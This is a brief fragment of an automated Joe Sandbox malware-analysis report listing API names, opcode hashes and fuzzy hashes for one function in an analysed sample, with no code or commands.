                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                        • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                        • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                        • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%